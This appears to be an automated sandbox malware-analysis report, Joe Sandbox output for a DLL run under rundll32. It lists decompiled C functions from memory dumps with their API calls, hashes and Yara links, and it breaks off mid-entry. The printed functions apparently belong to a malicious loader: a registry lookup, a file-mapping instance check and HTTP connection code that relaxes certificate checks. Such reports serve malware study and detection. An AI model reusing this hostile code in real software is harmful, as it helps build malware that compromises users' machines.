Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 8686ff69bb25bfdffacea869c9dbe63839e1c3675adcae02f63aaf4505e9181b
Instruction ID: 90063f05b7cb1924309a403ae80856e60b7328c97733d921d6037cc595a1fa4e
Opcode Fuzzy Hash: 8686ff69bb25bfdffacea869c9dbe63839e1c3675adcae02f63aaf4505e9181b
Instruction Fuzzy Hash: 7D215C7190020ADFCB19CF85C9C5EAEF7B8FB08345F518459E602D7019E3B4EAA8CB54

Uniqueness

Uniqueness Score: -1.00%

Function 70331768, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E70331768() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x703341c4);
				_push(1);
				_push( *0x703341d0 + 0x70335089);
				 *0x703341c0 = 0xc;
				 *0x703341c8 = 0; // executed
				L70331B44(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E70331823( &_v44,  &_v28,  *0x703341cc ^ 0xf7a71548) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x703341b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E703310ED(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x703341b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E7033212A(_t40, _t30 + 4);
					}
				}
				_t23 = E70331202(_v44); // executed
				goto L7;
			}

0x7033177a
0x7033177b
0x70331780
0x70331788
0x70331789
0x70331793
0x70331799
0x703317a2
0x703317a7
0x703317c5
0x7033181a
0x7033181b
0x7033181c
0x7033181c
0x703317cd
0x703317d3
0x703317e1
0x703317e5
0x703317ec
0x703317f4
0x703317f8
0x703317fa
0x70331809
0x703317fc
0x70331802
0x70331802
0x703317fa
0x70331811
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,703341C4,00000000), ref: 70331799
lstrlenW.KERNEL32(?,?,?), ref: 703317CD

Part of subcall function 703310ED: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,703317EA,0000000A,?,?), ref: 703310FA
Part of subcall function 703310ED: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 70331110
Part of subcall function 703310ED: _snwprintf.NTDLL ref: 70331135
Part of subcall function 703310ED: CreateFileMappingW.KERNELBASE(000000FF,703341C0,00000004,00000000,?,?), ref: 7033115A
Part of subcall function 703310ED: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,703317EA,0000000A,?), ref: 70331171
Part of subcall function 703310ED: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,703317EA,0000000A), ref: 703311A6

ExitThread.KERNEL32 ref: 7033181C

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
String ID:
API String ID: 4209869662-0
Opcode ID: 8fe473759a5502711592b3ac7710cbb75f477a0339f1ec5b502fc7221ba068ae
Instruction ID: 37da3dd68f02116fea2b5e40a5ea2dd54e48417b87320165fe1b9f9e733e30a4
Opcode Fuzzy Hash: 8fe473759a5502711592b3ac7710cbb75f477a0339f1ec5b502fc7221ba068ae
Instruction Fuzzy Hash: 8011BE72900201AFE301CB55CCC5E8BF7ECFB04604F514A16F411DB260D7B0F4858B92

Uniqueness

Uniqueness Score: -1.00%

Function 00C26793, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C26793(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0xc2a2d4; // 0x449d5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0xc2ba40; // 0x4f0053
				_v16 = 4;
				_t31 = E00C27206(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0xc2a2d4; // 0x449d5a8
					_t5 = _t19 + 0xc2ba9c; // 0x6e0049
					_t34 = E00C27206(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E00C213CC(_t34);
					}
					E00C213CC(_t31);
				}
				return _v8;
			}

0x00c26799
0x00c2679e
0x00c267a3
0x00c267aa
0x00c267b6
0x00c267ba
0x00c267bc
0x00c267c2
0x00c267ce
0x00c267d2
0x00c267e5
0x00c267ed
0x00c26801
0x00c26809
0x00c2680b
0x00c2680b
0x00c26812
0x00c26812
0x00c26819
0x00c26819
0x00c2681f
0x00c26824
0x00c2682a

APIs

Part of subcall function 00C27206: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00C267B6,004F0053,00000000,?), ref: 00C2720F
Part of subcall function 00C27206: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00C267B6,004F0053,00000000,?), ref: 00C27239
Part of subcall function 00C27206: memset.NTDLL ref: 00C2724D

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00C267E5
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00C26801
RegCloseKey.ADVAPI32(00000000), ref: 00C26812

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: ea75a61ee3ac600e07e49c00026b703da2a45327aa5198ddd197339c8e986d6d
Instruction ID: d3fcd6fc265ee1f0d83389d43e2b6afdc209ba9b65dabaa9038a69248d297907
Opcode Fuzzy Hash: ea75a61ee3ac600e07e49c00026b703da2a45327aa5198ddd197339c8e986d6d
Instruction Fuzzy Hash: 83116176500219FBD711DBD4EC89FAEB7FCAB04300F140055F615E6852EB709A05AB61

Uniqueness

Uniqueness Score: -1.00%

Function 70351280, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32(00000000,00000005,00000009,00000000), ref: 70351312

Strings

O>[#, xrefs: 703512C4, 7035139A, 703513C0

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: CreateSemaphore
String ID: O>[#
API String ID: 1078844751-938387968
Opcode ID: 3b03548e639c4d00166ef3e82a7cbf2f04747a4e55ea22278dced9899ced4b95
Instruction ID: fbda0f3c4f089eb085b9948880d5263035bc814f4d359b4a0f61236e372912a7
Opcode Fuzzy Hash: 3b03548e639c4d00166ef3e82a7cbf2f04747a4e55ea22278dced9899ced4b95
Instruction Fuzzy Hash: 62618D775217508FC308CF3AC960729BBA9FB85750B2651EAE49A977F0D3349448CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00C25A5D, Relevance: 3.1, APIs: 2, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00C25A5D(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _t37;
				long _t39;
				long _t40;
				signed int _t41;
				intOrPtr _t42;
				signed int _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				void* _t65;
				intOrPtr* _t67;
				intOrPtr* _t68;
				void* _t71;

				_t68 = __esi;
				_t65 = E00C23FC1(_t37, _a4);
				if(_t65 == 0) {
					L18:
					_t39 = GetLastError();
				} else {
					_t40 = GetVersion();
					_t71 = _t40 - 6;
					if(_t71 > 0 || _t71 == 0 && _t40 > 2) {
						_a4 = 4;
					} else {
						_a4 = 0;
					}
					__imp__(_t65, _a4, 0, 0, 0); // executed
					 *(_t68 + 0x10) = _t40;
					_t41 = E00C213CC(_t65);
					if( *(_t68 + 0x10) == 0) {
						goto L18;
					} else {
						_t42 = E00C23FC1(_t41,  *_t68);
						_v8 = _t42;
						if(_t42 == 0) {
							goto L18;
						} else {
							_t67 = __imp__; // 0x7029f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t68 + 0x10), _v8, 0x50, 0);
								 *((intOrPtr*)(_t68 + 0x14)) = _t42;
								_t43 = E00C213CC(_v8);
								if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x100;
									_t44 = E00C23FC1(_t43,  *((intOrPtr*)(_t68 + 4)));
									_v8 = _t44;
									if(_t44 == 0) {
										goto L18;
									} else {
										_t45 =  *0xc2a2d4; // 0x449d5a8
										_t21 = _t45 + 0xc2b76c; // 0x450047
										_t46 = _t21;
										__imp__( *((intOrPtr*)(_t68 + 0x14)), _t46, _v8, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t68 + 0x18)) = _t46;
										E00C213CC(_v8);
										_t48 =  *((intOrPtr*)(_t68 + 0x18));
										if(_t48 == 0) {
											goto L18;
										} else {
											_v12 = 4;
											__imp__(_t48, 0x1f,  &_a4,  &_v12);
											if(_t48 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t67( *((intOrPtr*)(_t68 + 0x18)), 0x1f,  &_a4, 4);
											}
											_push(4);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t68 + 0x18)));
											if( *_t67() == 0) {
												goto L18;
											} else {
												_push(4);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t68 + 0x18)));
												if( *_t67() == 0) {
													goto L18;
												} else {
													_t39 = 0;
												}
											}
										}
									}
								}
							} else {
								_t42 =  *_t67( *(_t68 + 0x10), 3,  &_a8, 4);
								if(_t42 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t39;
			}

0x00c25a5d
0x00c25a6c
0x00c25a72
0x00c25ba8
0x00c25ba8
0x00c25a78
0x00c25a78
0x00c25a7e
0x00c25a80
0x00c25a8e
0x00c25a89
0x00c25a89
0x00c25a89
0x00c25a9c
0x00c25aa3
0x00c25aa6
0x00c25aae
0x00000000
0x00c25ab4
0x00c25ab6
0x00c25abd
0x00c25ac0
0x00000000
0x00c25ac6
0x00c25ac9
0x00c25acf
0x00c25ae6
0x00c25aef
0x00c25af8
0x00c25afb
0x00c25b03
0x00000000
0x00c25b09
0x00c25b11
0x00c25b14
0x00c25b1d
0x00c25b20
0x00000000
0x00c25b26
0x00c25b29
0x00c25b34
0x00c25b34
0x00c25b3e
0x00c25b47
0x00c25b4a
0x00c25b4f
0x00c25b54
0x00000000
0x00c25b56
0x00c25b61
0x00c25b68
0x00c25b70
0x00c25b72
0x00c25b80
0x00c25b80
0x00c25b82
0x00c25b87
0x00c25b88
0x00c25b8a
0x00c25b91
0x00000000
0x00c25b93
0x00c25b93
0x00c25b98
0x00c25b99
0x00c25b9b
0x00c25ba2
0x00000000
0x00c25ba4
0x00c25ba4
0x00c25ba4
0x00c25ba2
0x00c25b91
0x00c25b54
0x00c25b20
0x00c25ad1
0x00c25adc
0x00c25ae0
0x00000000
0x00000000
0x00000000
0x00000000
0x00c25ae0
0x00c25acf
0x00c25ac0
0x00c25aae
0x00c25bb1

APIs

Part of subcall function 00C23FC1: lstrlen.KERNEL32(?,00000000,050C9CD0,7742C740,00C235B6,050C9ED5,00C2454B,00C2454B,?,00C2454B,?,69B25F44,E8FA7DD7,00000000), ref: 00C23FC8
Part of subcall function 00C23FC1: mbstowcs.NTDLL ref: 00C23FF1
Part of subcall function 00C23FC1: memset.NTDLL ref: 00C24003

GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,00C2135B,74B481D0,00000000,050C9698,?,?,00C230D3,?,050C9698,0000EA60), ref: 00C25A78
GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,00C2135B,74B481D0,00000000,050C9698,?,?,00C230D3,?,050C9698,0000EA60), ref: 00C25BA8

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: ErrorLastVersionlstrlenmbstowcsmemset
String ID:
API String ID: 4097109750-0
Opcode ID: 1ad3f423a584f0d3f2a5e5b1a5114c173ecb221eb1ce0a9b54e0da5c8e85719b
Instruction ID: 35dc0f56af9dcfacbc266978635ae7a685e9345e6146dcef614b523183f20f2c
Opcode Fuzzy Hash: 1ad3f423a584f0d3f2a5e5b1a5114c173ecb221eb1ce0a9b54e0da5c8e85719b
Instruction Fuzzy Hash: 2C414A75500619FFEF209FA0EC85FAF7BB9EF04741F004529BA11968A0D7719A45EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C23969, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00C23969(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00C24C9F(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xc2a2d4; // 0x449d5a8
						_t20 = _t68 + 0xc2b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00C26900(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00c2396f
0x00c23972
0x00c23982
0x00c2398b
0x00c2398f
0x00c23a5d
0x00c23a63
0x00c23a63
0x00c239a9
0x00c239ae
0x00c239b2
0x00c239b8
0x00c239bd
0x00c239c4
0x00c239d3
0x00c239d3
0x00c239d7
0x00c239d9
0x00c239e5
0x00c239f0
0x00c239fb
0x00c239ff
0x00c23a09
0x00c23a0d
0x00c23a0f
0x00c23a14
0x00c23a1b
0x00c23a2b
0x00c23a2b
0x00c23a14
0x00c23a0d
0x00c23a2d
0x00c23a32
0x00c23a37
0x00c23a37
0x00c23a3d
0x00c23a43
0x00c23a48
0x00c23a48
0x00c23a4d
0x00c23a52
0x00c23a52
0x00c23a4d
0x00c239d7
0x00c23a54
0x00c23a5a
0x00000000

APIs

Part of subcall function 00C24C9F: SysAllocString.OLEAUT32(80000002), ref: 00C24CF6
Part of subcall function 00C24C9F: SysFreeString.OLEAUT32(00000000), ref: 00C24D5B

SysFreeString.OLEAUT32(?), ref: 00C23A48
SysFreeString.OLEAUT32(00C254F6), ref: 00C23A52

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 2338f8f944194a040f5030418ce5008d73a1185bf78a3c1166f07c15271e021b
Instruction ID: df8b010e958fb2d71849f234f100d89badf5da63e220f0982358bb870ba236bc
Opcode Fuzzy Hash: 2338f8f944194a040f5030418ce5008d73a1185bf78a3c1166f07c15271e021b
Instruction Fuzzy Hash: 2A31AC729001A8EFCB11DF94D888C9BBB79FFC97407104659F8259B210D331DE41EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C2609A, Relevance: 3.0, APIs: 2, Instructions: 47
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C2609A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t15;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E00C23FC1(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000; // executed
					_t15 = E00C25A1E(__ecx, _a4, _a8, _t23); // executed
					_t20 = _t15;
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E00C21E65(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0xc2a290, 0, _t23);
				}
				return _t20;
			}

0x00c2609a
0x00c260ab
0x00c260af
0x00c26108
0x00c260b1
0x00c260b8
0x00c260be
0x00c260c2
0x00c260c7
0x00c260cb
0x00c260d1
0x00c260e1
0x00c260f3
0x00c260f3
0x00c260fe
0x00c260fe
0x00c2610f

APIs

Part of subcall function 00C23FC1: lstrlen.KERNEL32(?,00000000,050C9CD0,7742C740,00C235B6,050C9ED5,00C2454B,00C2454B,?,00C2454B,?,69B25F44,E8FA7DD7,00000000), ref: 00C23FC8
Part of subcall function 00C23FC1: mbstowcs.NTDLL ref: 00C23FF1
Part of subcall function 00C23FC1: memset.NTDLL ref: 00C24003

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74B05520,00000008,00000014,004F0053,050C930C), ref: 00C260D1
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74B05520,00000008,00000014,004F0053,050C930C), ref: 00C260FE

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID:
API String ID: 1500278894-0
Opcode ID: 03812aae60a4dc62206883481280bb0f208ab324ad88b6148ba8512f3950c9ce
Instruction ID: 9e0a61f304832c092bad09d29dcbfdb91a3ca73b2315d0ea42adb91e482f6ff5
Opcode Fuzzy Hash: 03812aae60a4dc62206883481280bb0f208ab324ad88b6148ba8512f3950c9ce
Instruction Fuzzy Hash: D5018B32210219BBDB22AF98EC85F9E7FB9FB84700F104424FE4496561EBB19925E761

Uniqueness

Uniqueness Score: -1.00%

Function 00C25F4F, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00C23E52), ref: 00C25F69

Part of subcall function 00C23969: SysFreeString.OLEAUT32(?), ref: 00C23A48

SysFreeString.OLEAUT32(00000000), ref: 00C25FA9

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 42b85f249d4823e1c21df4e643b4c5d02acd9d5316803f4e0d3b9e139f3c30be
Instruction ID: 2333ded506045bcaa689b850752e75e49fd564717370ab233bfff0f843682a1c
Opcode Fuzzy Hash: 42b85f249d4823e1c21df4e643b4c5d02acd9d5316803f4e0d3b9e139f3c30be
Instruction Fuzzy Hash: 2A016D7691151EFFCB119FA9DD08EAFBBB9EF48310F000021FA05A6120D7709E15DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 703428A0, Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 7034BA00: GetEnvironmentStringsW.KERNEL32 ref: 7034BA09
Part of subcall function 7034BA00: _free.LIBCMT ref: 7034BA68
Part of subcall function 7034BA00: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7034BA77

_free.LIBCMT ref: 703428E0
_free.LIBCMT ref: 703428E7

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: ab0cce2f6c9aa2095ba45662c56b34d8e608652dbfcce83a28c0f6cccbbaafbe
Instruction ID: a5908ada9b9e41a7db1741dc7d156bebe2a7169c2d86e8f48184997af4c95837
Opcode Fuzzy Hash: ab0cce2f6c9aa2095ba45662c56b34d8e608652dbfcce83a28c0f6cccbbaafbe
Instruction Fuzzy Hash: 40E09B2390692059E3221A7F9C42A7E27D94F812B4B76325AF430EE1D5DF60588712A5

Uniqueness

Uniqueness Score: -1.00%

Function 00C2694D, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xc2a294) == 0) {
						E00C2566B();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xc2a294) == 1) {
						_t10 = E00C2682B(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x00c26954
0x00c26955
0x00c26958
0x00c2698a
0x00c2698c
0x00c2698c
0x00c2695a
0x00c2695b
0x00c26970
0x00c26977
0x00c26979
0x00c26979
0x00c26977
0x00c2695b
0x00c26994

APIs

InterlockedIncrement.KERNEL32(00C2A294), ref: 00C26962

Part of subcall function 00C2682B: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00C26840

InterlockedDecrement.KERNEL32(00C2A294), ref: 00C26982

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 60f5283df16d1a5ffe78ae1c5717d23b3771ebf7e94d7325859ceaad1bf80e1d
Instruction ID: aed14bb17074a0b62cbf962588892c9ebca72152d80862e3041802223226b760
Opcode Fuzzy Hash: 60f5283df16d1a5ffe78ae1c5717d23b3771ebf7e94d7325859ceaad1bf80e1d
Instruction Fuzzy Hash: A7E04F3521A233978A32FB74BC44B5EA650BB10B40F105524B4DAE1CA1CF30DD819AF2

Uniqueness

Uniqueness Score: -1.00%

Function 00C25DD0, Relevance: 2.6, APIs: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00C25DD0(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x7029e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}

0x00c25dd7
0x00c25de4
0x00c25de6
0x00c25de9
0x00c25e2e
0x00c25e36
0x00c25e3c
0x00c25e40
0x00000000
0x00000000
0x00c25ded
0x00c25df8
0x00c25dfb
0x00c25e2c
0x00000000
0x00000000
0x00c25dfd
0x00c25e00
0x00c25e07
0x00c25e0b
0x00c25e14
0x00c25e1c
0x00c25e4a
0x00c25e1e
0x00c25e1e
0x00000000
0x00c25e1e
0x00c25e1c
0x00c25e07
0x00c25e4d
0x00c25e54
0x00c25e54
0x00000000

APIs

GetLastError.KERNEL32 ref: 00C25DED
GetLastError.KERNEL32 ref: 00C25E44

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: a368b50f6abff3f5ed879ab40fb7c0e9d15d3d2d8f4a14e37677d2a33c80813d
Instruction ID: 2798495d53d4f97258dcabb03da79a0d01384e3c47bb2f3e967e96a7b02c6220
